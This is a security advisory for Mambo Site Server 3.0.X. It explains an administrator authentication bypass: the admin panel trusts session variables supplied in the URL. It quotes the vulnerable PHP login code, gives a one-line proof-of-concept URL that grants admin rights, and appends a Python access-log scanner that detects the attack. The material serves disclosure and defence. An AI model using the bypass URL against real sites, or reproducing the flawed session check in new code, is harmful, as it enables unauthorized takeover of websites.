Mambo Site Server version 3.0.X security vulnerability

Published: 2001-01-01
Updated: 2001-01-01
Severity: High
Threat level: normal user access privileges
Error type: input validation error
Exploitation: server mode

Affected systems

Mambo Site Server version 3.0.X

Detailed description

Any user can obtain administrator privileges. In the 'administrator' directory, index.php is used to check the username and password:

    if (isset($submit)){
        $query = "SELECT id, password, name FROM users WHERE username='$myname' AND (usertype='administrator' OR usertype='superadministrator')";
        $result = $database->openConnectionWithReturn($query);
        if (mysql_num_rows($result)!= 0){
            list($userid, $dbpass, $fullname) = mysql_fetch_array($result);
            // .....
            if (strcmp($dbpass,$pass)) {
                //if the password entered does not match the database record ask user to login again
                print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
            }else {
                //if the password matches the database
                if ($remember!="on"){
                    //if the user does not want the password remembered and the cookie is set, delete the cookie
                    if ($passwordcookie!=""){
                        setcookie("passwordcookie");
                        $passwordcookie="";
                    }
                }
                //set up the admin session then take the user into the admin section of the site
                session_register("myname");
                session_register("fullname");
                session_register("userid");
                print "<SCRIPT>window.open('index2.php','newwindow');</SCRIPT>\n";
                print "<SCRIPT>document.location.href='$live_site'</SCRIPT>\n";
            }
        }else {
            print "<SCRIPT>alert('Incorrect Username and Password, please try again'); document.location.href='index.php';</SCRIPT>\n";
        }
    }

We can see that if the supplied password matches an administrator record in the database, several variables are registered in the SESSION and the user is redirected to index2.php:

    if (!$PHPSESSID){
        print "<SCRIPT>document.location.href='index.php'</SCRIPT>\n";
        exit(0);
    } else {
        session_start();
        if (!$myname) session_register("myname");
        if (!$fullname) session_register("fullname");
        if (!$uid) session_register("userid");
    }

In index2.php we can see that the user is validated only through the global variable PHPSESSID. Because variables can be declared in the URL, setting 'myname', 'fullname' and 'userid' there grants administrator control.

Test code

http://target.machine/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator

Solution

None yet.
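As an added detection example (not part of the original advisory), the following Python scan runs over web-server access-log lines and flags index2.php requests that carry the session variable names in the query string, which a legitimate login never does because index.php registers them server-side. The log format, addresses and timestamps are constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Session variables index2.php reads without checking where they came from.
INJECTED_NAMES = {"myname", "fullname", "userid"}
ADMIN_PATH = "/administrator/index2.php"

# Combined Log Format; only the client address, timestamp and URL are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<url>\S+)[^"]*"')


def injected_params(url):
    """Injected session-variable names in an index2.php URL; empty set for any other path."""
    parts = urlsplit(url)
    if parts.path.lower() != ADMIN_PATH:
        return set()
    params = parse_qs(parts.query, keep_blank_values=True)
    # A bare PHPSESSID is not reported: a normal login redirect may carry one.
    return {name for name in params if name.lower() in INJECTED_NAMES}


def scan_log(lines):
    """Return (ip, timestamp, sorted injected names) for each suspicious log line.

    Only GET parameters are visible here; the same names sent in a POST body
    or a cookie would need request-body logging or a WAF rule to catch.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        names = injected_params(m.group("url"))
        if names:
            hits.append((m.group("ip"), m.group("ts"), sorted(names)))
    return hits


# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2001:10:00:01 +0000] "GET /administrator/index.php HTTP/1.0" 200 512',
    '203.0.113.7 - - [01/Jan/2001:10:00:05 +0000] "GET /administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator HTTP/1.0" 200 2048',
    '198.51.100.2 - - [01/Jan/2001:10:01:00 +0000] "GET /administrator/index2.php?PHPSESSID=abc123 HTTP/1.0" 200 2048',
    '198.51.100.2 - - [01/Jan/2001:10:02:00 +0000] "GET /index.php?myname=guest HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for ip, ts, names in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} injected {', '.join(names)}")
```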